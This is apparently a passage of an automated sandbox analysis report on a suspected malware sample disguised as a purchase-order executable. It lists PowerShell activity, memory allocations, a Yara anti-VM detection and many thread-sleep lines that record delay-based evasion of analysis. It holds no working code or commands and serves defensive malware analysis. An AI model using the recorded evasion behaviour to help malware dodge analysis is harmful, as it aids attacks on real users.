Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 2B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 9150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 79F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: A150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: B150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599589	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598782	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597247	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Thread delayed: delay time: 594141	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5885	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3848	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Window / User API: threadDelayed 2053	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Window / User API: threadDelayed 7788	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Window / User API: foregroundWindowGot 1742	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 1620	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7480	Thread sleep count: 2053 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7480	Thread sleep count: 7788 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599589s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476	Thread sleep time: -597359s >= -30000s	Jump to behavior
